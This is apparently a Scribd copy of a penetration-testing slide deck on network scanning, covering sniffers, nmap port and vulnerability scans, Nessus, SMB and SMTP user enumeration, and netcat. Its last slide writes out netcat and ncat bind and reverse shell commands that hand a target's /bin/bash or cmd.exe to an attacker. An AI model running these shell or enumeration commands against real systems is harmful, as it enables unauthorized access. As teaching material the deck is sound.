0% found this document useful (0 votes)

13 views15 pages

Scanning

Uploaded by

testetestecite

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as ODP, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

13 views15 pages

Scanning

Uploaded by

testetestecite

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as ODP, PDF, TXT or read online on Scribd

You are on page 1/ 15

Network Penetration Testing

Scanning Steps

Network Sweeping
●

Network Tracing
●

Port Scanning
●

OS Fingerprinting
●

Version Scanning
●

Vulnerability Scanning
●

2
Scanning

TIPS
●

–When scanning systems use IP addresses instead of Domain

Names.
–In large scan cases use most popular ports instead of all ports OR
if you want to scan all the ports use multiple systems to perform
full scanning on the target organization.
–Run a sniffer.

3
Sniffers

●
TCPDUMP
–tcpdump -nn -X -v -i eth0 -s0
–tcpdump -nn {tcp|udp|icmp|arp|ip} {and|or|not} {port} {and|or|not}
{dst|src|host} 8.8.8.8
–tcpdump -nn tcp and port 21 and host 10.0.2.5 -i eth0 -s0 -w ftp.pcapng

–tcpdump -nn -r ftp.pcapng

●
Wireshark
–ip.addr == 192.168.1.14
–ip.addr == 192.168.1.1 and http
–http or arp
–ip.addr == 192.168.1.1 and tcp.port == 80

4
Network Sweeping

●
NMAP do host discovery through ARP(local),
ICMP(root), TCP SYN port 443, TCP ACK port 80.
–nmap -n -sn 8.8.8.8

If the above method fails run normal port scanning

●

without host discovery.

–nmap -n -Pn -sS 8.8.8.8

5
Network Tracing

Linux traceroute use UDP by default

●

–traceroute -n 8.8.8.8 #UDP

–traceroute -I 8.8.8.8 #ICMP

–traceroute -T 8.8.8.8 #TCP

Windows tracert use ICMP by default

●

–tracert -d 8.8.8.8 #ICMP

6
Port Scanning

TCP Three way handshake

●

7
Port Scanning

TCP Behavior
●

–send=SYN, recieve=SYN-ACK

Port Open
●

–send=SYN, recieve=RST-ACK

Port Close
●

–send=SYN, recieve=ICMP-Port-Unreachable

Blocked by Firewall (Filtered)

●

–send=SYN, recieve=Nothing

Blocked by Firewall (Filtered)

●
8
Port Scanning

UDP Behavior
●

–send=UDP, recieve=UDP

Port Open
●

–send=UDP, recieve=ICMP-Port-Unreachable

Port Close OR Blocked by Firewall

●

–send=UDP, recieve=Nothing
●
Port Close OR Blocked by Firewall OR Port Open but it
is looking for specific data in UDP payload
Nmap result => (Open|Filtered)
●
9
Port Scanning

No host discovery and control speed

●

–nmap -Pn -T{0|1|2|3|4|5} 8.8.8.8

Scan type (SYN or Connect or UDP)

●

–nmap -s{S|T|U} 8.8.8.8

Scan specific ports

●

–nmap -p { 21,22,80,443 | 20-80 | - } 8.8.8.8

–nmap --top-ports 100 100 8.8.8.8

Store result in file

●

–nmap -oA filename 8.8.8.8

Special options
●

–nmap --reason 8.8.8.8

–nmap --badsum 8.8.8.8

10
OS Fingerprinting & Version Scanning

OS Fingerprinting
●

–nmap -O 8.8.8.8

Version Scanning
●

–nmap -sV 8.8.8.8

–nmap -A 8.8.8.8 #A = -sV -O -sC

11
Vulnerability Scanning

NMAP Script Engine

●

–ls /usr/share/nmap/scripts/

–nmap -sC 8.8.8.8

–nmap --script=http-robots.txt.nse -p80 8.8.8.8

–nmap -p 80 --script=http-vuln-cve2010-2861.nse 192.168.1.1

–nmap -p 21 --script=ftp-anon.nse 192.168.1.1

–nmap -p 139,445 --script=smb-security-mode.nse 192.168.1.1

–nmap -p 139,445 --script=smb* 192.168.1.1

–nmap --script=smb-os-discovery.nse 10.0.2.5

–nmap --script=dns-zone-transfer -p 53 zonetransfer.me

12
Vulnerability Scanning

Nessus
●

–https://www.tenable.com/downloads/nessus

–dpkg -i Nessus-6.9.4-debian6_amd64.deb

–service nessusd start

–update-rc.d nessusd enable

–https://localhost:8834/

13
Enumerating Users

SMB
●

–NULL Session

rpcclient -U "" -N 10.0.2.4

●

–enumdomusers

–queryuser 0x3e8

–Session with username and password

rpcclient -U "test" 10.0.2.4

●

–Enum4Linux

enum4linux 10.0.2.4
●

enum4linux -u "test" -p "test" 10.0.2.4

●

SMTP
●

–telnet 192.168.1.104 25

VRFY msfadmin
●

–smtp-user-enum -M VRFY -U users.txt -t 192.168.1.104

14
Netcat & Ncat

Find open ports

●

–nc -nv 127.0.0.1 21

–nc -vz 127.0.0.1 21

–nc -v 127.0.0.1 21

–timeout 1 nc -v 127.0.0.1 21

Chat using nc
●

–nc -nlvp 4444 #on server

–nc -nv 127.0.0.1 4444 #on client

Bind shell
●

–nc -nlvp 4444 -e /bin/bash (cmd.exe) #on target

–nc -nv 127.0.0.1 4444 #on attacker

Reverse shell
●

–nc -nlvp 4444 #on attacker

–nc -nv 127.0.0.1 4444 -e /bin/bash (cmd.exe) #on target

Ncat
●

–ncat --exec /bin/bash (cmd.exe) --allow 127.0.0.1 -vnl 4444 --ssl

–ncat -v 127.0.0.1 4444 --ssl

Mastering Nmap For Advanced Usage - Complete Step-By-Step Guide With Pro Techniques - Hackzone Cyber Security Blog
No ratings yet
Mastering Nmap For Advanced Usage - Complete Step-By-Step Guide With Pro Techniques - Hackzone Cyber Security Blog
11 pages
Network Security VAPT Checklist
No ratings yet
Network Security VAPT Checklist
7 pages
Minor Project Revan
No ratings yet
Minor Project Revan
6 pages
Cyber Security Network Scanning
No ratings yet
Cyber Security Network Scanning
23 pages
11 2PortScanning
No ratings yet
11 2PortScanning
10 pages
Network Scanning Techniques Guide
100% (1)
Network Scanning Techniques Guide
69 pages
A Practical Approach To Network Monitoring
100% (1)
A Practical Approach To Network Monitoring
25 pages
Nmap Scans and Commands Guide
No ratings yet
Nmap Scans and Commands Guide
7 pages
Lession 3.2
No ratings yet
Lession 3.2
35 pages
A Practical Approach To Network Monitoring.
No ratings yet
A Practical Approach To Network Monitoring.
24 pages
Hacking Steps
No ratings yet
Hacking Steps
29 pages
Information Security - NMAP
No ratings yet
Information Security - NMAP
23 pages
Nmap Network Scan Documentation
No ratings yet
Nmap Network Scan Documentation
5 pages
Cybersecurity Footprinting Guide
No ratings yet
Cybersecurity Footprinting Guide
55 pages
Manual
No ratings yet
Manual
14 pages
Nmap Guide for Security Newbies
No ratings yet
Nmap Guide for Security Newbies
10 pages
LAB 02 - Scanning - Mastring Nmap
No ratings yet
LAB 02 - Scanning - Mastring Nmap
5 pages
Practicals 2
No ratings yet
Practicals 2
3 pages
Cybersecurity Penetration Insights
No ratings yet
Cybersecurity Penetration Insights
25 pages
Nmap Cheat Sheet From Discovery To Exploits - Part 1 Introduction To Nmap
No ratings yet
Nmap Cheat Sheet From Discovery To Exploits - Part 1 Introduction To Nmap
19 pages
Foot Printing
No ratings yet
Foot Printing
21 pages
Advanced Task1 Network Vapt
No ratings yet
Advanced Task1 Network Vapt
17 pages
9 Network Discovery and Network Security
No ratings yet
9 Network Discovery and Network Security
24 pages
Attack and Penetration
100% (1)
Attack and Penetration
44 pages
HW 2 - Scanning
No ratings yet
HW 2 - Scanning
24 pages
Intro To Cyber Project.
No ratings yet
Intro To Cyber Project.
23 pages
Lec3-03 - Performing Security Assessments
No ratings yet
Lec3-03 - Performing Security Assessments
18 pages
Scanning Phase 2 Eh 4
No ratings yet
Scanning Phase 2 Eh 4
25 pages
Penetration Testing Essentials
No ratings yet
Penetration Testing Essentials
114 pages
Network Scanning for Hackers
100% (2)
Network Scanning for Hackers
36 pages
Project 7 Network Port Scanning
No ratings yet
Project 7 Network Port Scanning
8 pages
Penetration Testing Reconnaissance With
No ratings yet
Penetration Testing Reconnaissance With
3 pages
Port Scanners: Information Networking Security and Assurance Lab National Chung Cheng University
No ratings yet
Port Scanners: Information Networking Security and Assurance Lab National Chung Cheng University
22 pages
Lab Experiment #08 - Network & Host Detection Scans
No ratings yet
Lab Experiment #08 - Network & Host Detection Scans
3 pages
Pentesting Cheatsheet
No ratings yet
Pentesting Cheatsheet
51 pages
Assignment 2
No ratings yet
Assignment 2
6 pages
InfoSec Pen Testing Part 2 Scanning
No ratings yet
InfoSec Pen Testing Part 2 Scanning
26 pages
Week 3
No ratings yet
Week 3
2 pages
Cybersecurity Footprinting Guide
No ratings yet
Cybersecurity Footprinting Guide
24 pages
OSCP Active Directory Guide
No ratings yet
OSCP Active Directory Guide
70 pages
CSE4482 07 ProtectionMechanisms ScanningAnalysisTools 2013 Posted
No ratings yet
CSE4482 07 ProtectionMechanisms ScanningAnalysisTools 2013 Posted
83 pages
NMap Scan Guide
100% (8)
NMap Scan Guide
467 pages
eJPT D3V!1
No ratings yet
eJPT D3V!1
129 pages
Information Gathering Techniques in Cyber Security
No ratings yet
Information Gathering Techniques in Cyber Security
23 pages
Port Scanning
No ratings yet
Port Scanning
10 pages
Laboratory Setup: Step 1: Download Metasploitable, Which Is A Linux Machine. It Can Be Downloaded From
No ratings yet
Laboratory Setup: Step 1: Download Metasploitable, Which Is A Linux Machine. It Can Be Downloaded From
13 pages
NMAP
No ratings yet
NMAP
13 pages
02 Reconnaissance Techniques
No ratings yet
02 Reconnaissance Techniques
34 pages
Module 04 - Penetration Testing
No ratings yet
Module 04 - Penetration Testing
273 pages
Penetration Testing Commands
No ratings yet
Penetration Testing Commands
22 pages
Nmap Guide: Commands & Uses Explained
No ratings yet
Nmap Guide: Commands & Uses Explained
3 pages
Lecture 17 NMAP
No ratings yet
Lecture 17 NMAP
6 pages
Cyber Security For Beginners PDF
No ratings yet
Cyber Security For Beginners PDF
28 pages
Firewall Security
No ratings yet
Firewall Security
35 pages
Objectives:: LTPC 3 0 0 3
No ratings yet
Objectives:: LTPC 3 0 0 3
1 page
Techniques For Enumeration
No ratings yet
Techniques For Enumeration
23 pages
Default Route Configuration Guide
No ratings yet
Default Route Configuration Guide
8 pages
Connectin SoMove Lite Via Ethernet - IP Card - FAQ
No ratings yet
Connectin SoMove Lite Via Ethernet - IP Card - FAQ
5 pages
Mobile Computing Syllabus
No ratings yet
Mobile Computing Syllabus
2 pages
R81.20 - Maestro - CLI - Cheat - v07 1
No ratings yet
R81.20 - Maestro - CLI - Cheat - v07 1
4 pages
Frame Relay: Term Paper On
No ratings yet
Frame Relay: Term Paper On
20 pages
EC200 Hop
No ratings yet
EC200 Hop
49 pages
Ch-8.2 Multimedia Communication System
No ratings yet
Ch-8.2 Multimedia Communication System
12 pages
TP Link C5 Recovery
No ratings yet
TP Link C5 Recovery
2 pages
Zone-Based Firewalls & Security
No ratings yet
Zone-Based Firewalls & Security
71 pages
DCN 01
No ratings yet
DCN 01
11 pages
LTE Fundamentals + PHY: Network Architecture Interfaces
No ratings yet
LTE Fundamentals + PHY: Network Architecture Interfaces
9 pages
NGN Syllabus
No ratings yet
NGN Syllabus
4 pages
Optical Transmission Specs Guide
No ratings yet
Optical Transmission Specs Guide
6 pages
Examen
No ratings yet
Examen
41 pages
Cisco 200-301 CCNA Exam Updated Dumps
No ratings yet
Cisco 200-301 CCNA Exam Updated Dumps
57 pages
Pass4sure 200 355 Cisco CCNA Wireles Exa PDF
No ratings yet
Pass4sure 200 355 Cisco CCNA Wireles Exa PDF
7 pages
Assignment 1 Solution
No ratings yet
Assignment 1 Solution
5 pages
3438
No ratings yet
3438
4 pages
Application Notes For Configuring Open Text Fax Server, Rightfax Edition, With Avaya Aura Communication Manager Via H.323 Trunk Interface - Issue 1.1
No ratings yet
Application Notes For Configuring Open Text Fax Server, Rightfax Edition, With Avaya Aura Communication Manager Via H.323 Trunk Interface - Issue 1.1
38 pages
Data Communications and Networking
No ratings yet
Data Communications and Networking
74 pages
Obzor Produktov VI
No ratings yet
Obzor Produktov VI
88 pages
Mikrotik Security
100% (4)
Mikrotik Security
54 pages
H02 Answer CN
No ratings yet
H02 Answer CN
6 pages
LAN - L3 Design
No ratings yet
LAN - L3 Design
40 pages
DHCP 80-20 Rule
No ratings yet
DHCP 80-20 Rule
12 pages
Lab 2
No ratings yet
Lab 2
10 pages
M Cat - 692R0 GMC203
No ratings yet
M Cat - 692R0 GMC203
3 pages

Scanning

Uploaded by

Scanning

Uploaded by

Network Penetration Testing

–When scanning systems use IP addresses instead of Domain

–tcpdump -nn -r ftp.pcapng

If the above method fails run normal port scanning

without host discovery.

Linux traceroute use UDP by default

–traceroute -n 8.8.8.8 #UDP

–traceroute -I 8.8.8.8 #ICMP

–traceroute -T 8.8.8.8 #TCP

Windows tracert use ICMP by default

–tracert -d 8.8.8.8 #ICMP

TCP Three way handshake

Blocked by Firewall (Filtered)

Blocked by Firewall (Filtered)

Port Close OR Blocked by Firewall

No host discovery and control speed

–nmap -Pn -T{0|1|2|3|4|5} 8.8.8.8

Scan type (SYN or Connect or UDP)

–nmap -s{S|T|U} 8.8.8.8

Scan specific ports

–nmap -p { 21,22,80,443 | 20-80 | - } 8.8.8.8

Store result in file

–nmap -oA filename 8.8.8.8

–nmap --reason 8.8.8.8

–nmap --badsum 8.8.8.8

–nmap -sV 8.8.8.8

–nmap -A 8.8.8.8 #A = -sV -O -sC

NMAP Script Engine

–nmap -sC 8.8.8.8

–nmap --script=http-robots.txt.nse -p80 8.8.8.8

–nmap -p 80 --script=http-vuln-cve2010-2861.nse 192.168.1.1

–nmap -p 21 --script=ftp-anon.nse 192.168.1.1

–nmap -p 139,445 --script=smb-security-mode.nse 192.168.1.1

–nmap -p 139,445 --script=smb* 192.168.1.1

–nmap --script=smb-os-discovery.nse 10.0.2.5

–nmap --script=dns-zone-transfer -p 53 zonetransfer.me

–service nessusd start

–update-rc.d nessusd enable

rpcclient -U "" -N 10.0.2.4

–Session with username and password

rpcclient -U "test" 10.0.2.4

enum4linux -u "test" -p "test" 10.0.2.4

–smtp-user-enum -M VRFY -U users.txt -t 192.168.1.104

Find open ports

–nc -nv 127.0.0.1 21

–nc -vz 127.0.0.1 21

–nc -nlvp 4444 #on server

–nc -nv 127.0.0.1 4444 #on client

–nc -nlvp 4444 -e /bin/bash (cmd.exe) #on target

–nc -nv 127.0.0.1 4444 #on attacker

–nc -nlvp 4444 #on attacker

–nc -nv 127.0.0.1 4444 -e /bin/bash (cmd.exe) #on target

–ncat --exec /bin/bash (cmd.exe) --allow 127.0.0.1 -vnl 4444 --ssl

–ncat -v 127.0.0.1 4444 --ssl

You might also like